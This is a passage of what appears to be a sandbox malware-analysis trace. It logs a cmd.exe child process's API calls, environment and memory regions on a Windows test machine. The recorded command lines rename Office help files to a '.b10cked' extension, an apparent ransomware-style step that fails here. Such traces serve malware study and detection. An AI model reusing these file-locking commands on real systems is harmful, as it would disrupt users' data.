lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x0, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegCloseKey (hKey=0x40) returned 0x0 [0197.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ea8c | out: phkResult=0x18ea8c*=0x40) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, 
lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x0, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x9, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x9, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.445] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x9, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.445] RegCloseKey (hKey=0x40) returned 0x0 [0197.445] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639f [0197.445] srand (_Seed=0x5b88639f) [0197.445] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"" [0197.445] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"" [0197.445] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.445] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0197.446] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.446] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.446] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.446] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0197.446] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0197.446] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0197.446] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0197.446] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0197.446] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0197.446] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0197.446] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0197.446] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0197.446] GetEnvironmentStringsW () returned 0x2a22e0* [0197.446] FreeEnvironmentStringsW (penv=0x2a22e0) returned 1 [0197.446] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.446] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.446] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0197.446] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0197.446] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0197.446] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0197.446] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0197.447] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0197.447] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0197.447] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0197.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f858 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f858, lpFilePart=0x18f854 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f854*="Desktop") returned 0x18 [0197.447] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.447] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f5d4 | out: lpFindFileData=0x18f5d4) returned 0x2a0020 [0197.447] FindClose (in: hFindFile=0x2a0020 | out: hFindFile=0x2a0020) returned 1 [0197.447] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f5d4 | out: lpFindFileData=0x18f5d4) returned 0x2a0020 [0197.447] FindClose (in: hFindFile=0x2a0020 | out: hFindFile=0x2a0020) returned 1 [0197.447] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f5d4 | out: lpFindFileData=0x18f5d4) returned 0x2a0020 [0197.448] FindClose (in: hFindFile=0x2a0020 | out: hFindFile=0x2a0020) returned 1 [0197.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.448] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0197.448] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0197.448] GetEnvironmentStringsW () returned 0x2a2b00* [0197.448] FreeEnvironmentStringsW (penv=0x2a2b00) returned 1 [0197.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.449] GetConsoleOutputCP () returned 0x1b5 [0197.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0197.449] GetUserDefaultLCID () returned 0x409 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f998, cchData=128 | out: lpLCData="0") returned 2 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f998, cchData=128 | out: lpLCData="0") returned 2 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f998, cchData=128 | out: lpLCData="1") returned 2 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0197.450] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0197.451] GetConsoleTitleW (in: lpConsoleTitle=0x2908e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0197.451] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.451] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0197.451] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0197.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0197.452] _wcsicmp (_String1="move", _String2=")") returned 68 [0197.452] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0197.452] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0197.453] _wcsicmp (_String1="IF", _String2="move") returned -4 [0197.453] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0197.453] _wcsicmp (_String1="REM", _String2="move") returned 5 [0197.453] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0197.456] GetConsoleTitleW (in: lpConsoleTitle=0x18f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.457] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0197.457] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0197.457] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0197.457] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0197.457] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="CD") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="REN") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0197.457] _wcsicmp (_String1="move", _String2="SET") returned -6 [0197.457] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0197.457] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0197.457] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0197.457] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0197.457] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0197.457] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0197.457] _wcsicmp (_String1="move", _String2="RD") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0197.457] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0197.457] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0197.457] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0197.457] _wcsicmp (_String1="move", _String2="VER") returned -9 [0197.457] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0197.457] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0197.457] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0197.457] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0197.458] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0197.458] _wcsicmp (_String1="move", _String2="START") returned -6 [0197.458] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0197.458] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0197.458] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0197.460] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.460] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.460] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f44c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f444, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f444*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0197.460] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0197.462] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0197.462] _wcsicmp (_String1="MSEXCE~2.HXN", _String2=".") returned 63 [0197.462] _wcsicmp (_String1="MSEXCE~2.HXN", _String2="..") returned 63 [0197.462] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~2.hxn")) returned 0x2022 [0197.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a1e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.505] SetErrorMode (uMode=0x0) returned 0x0 [0197.505] SetErrorMode (uMode=0x1) returned 0x0 [0197.505] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", nBufferLength=0x104, lpBuffer=0x18edd4, lpFilePart=0x18edbc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", lpFilePart=0x18edbc*="MSEXCE~2.HXN") returned 0x27 [0197.505] SetErrorMode (uMode=0x0) returned 0x1 [0197.505] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0197.506] _wcsicmp (_String1="MSEXCE~2.HXN", _String2=".") returned 63 [0197.506] _wcsicmp (_String1="MSEXCE~2.HXN", _String2="..") returned 63 [0197.506] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~2.hxn")) returned 0x2022 [0197.506] SetErrorMode (uMode=0x0) returned 0x0 [0197.506] SetErrorMode (uMode=0x1) returned 0x0 [0197.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", nBufferLength=0x104, lpBuffer=0x18f250, lpFilePart=0x18efe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", lpFilePart=0x18efe8*="MSEXCE~2.HXN") returned 0x27 [0197.506] SetErrorMode (uMode=0x0) returned 0x1 [0197.506] SetErrorMode (uMode=0x0) returned 0x0 [0197.506] SetErrorMode (uMode=0x1) returned 0x0 [0197.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f458, lpFilePart=0x18efe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked", lpFilePart=0x18efe8*="MS.EXCEL.DEV.14.1033.hxn.b10cked") returned 0x3b [0197.506] SetErrorMode (uMode=0x0) returned 0x1 [0197.506] SetLastError (dwErrCode=0x0) [0197.506] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.excel.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0197.507] GetLastError () returned 0x2 [0197.507] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e964, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e964) returned 0x290e88 [0197.507] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x18e964 | out: lpFindFileData=0x18e964) returned 0 [0197.508] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.508] GetLastError () returned 0x12 [0197.508] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e964, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x18e964) returned 0x290e88 [0197.508] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x18e964 | out: lpFindFileData=0x18e964) returned 0 [0197.508] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.508] GetLastError () returned 0x12 [0197.509] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2a1bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a1bf0) returned 0x290e88 [0197.509] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x2a1bf0 | out: lpFindFileData=0x2a1bf0) returned 0 [0197.509] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.510] GetLastError () returned 0x12 [0197.510] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2a1bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a1bf0) returned 0x290e88 [0197.510] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x2a1bf0 | out: lpFindFileData=0x2a1bf0) returned 0 [0197.510] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.510] GetLastError () returned 0x12 [0197.510] _get_osfhandle (_FileHandle=2) returned 0xb [0197.510] GetFileType (hFile=0xb) returned 0x2 [0197.510] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0197.510] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18eb34 | out: lpMode=0x18eb34) returned 1 [0197.510] _get_osfhandle (_FileHandle=2) returned 0xb [0197.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18eb68 | out: lpConsoleScreenBufferInfo=0x18eb68) returned 1 [0197.511] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.512] FormatMessageW (in: dwFlags=0x1800, 
lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18eba8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.512] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18eb8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18eb8c*=0x2c) returned 1 [0197.512] longjmp () [0197.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.513] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.513] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.513] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.513] SetConsoleInputExeNameW () returned 0x1 [0197.513] GetConsoleOutputCP () returned 0x1b5 [0197.513] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.513] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.514] exit (_Code=1) Process: id = "461" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], 
"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29196 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29197 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29198 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29199 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 29200 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29201 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29202 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29203 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29204 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = 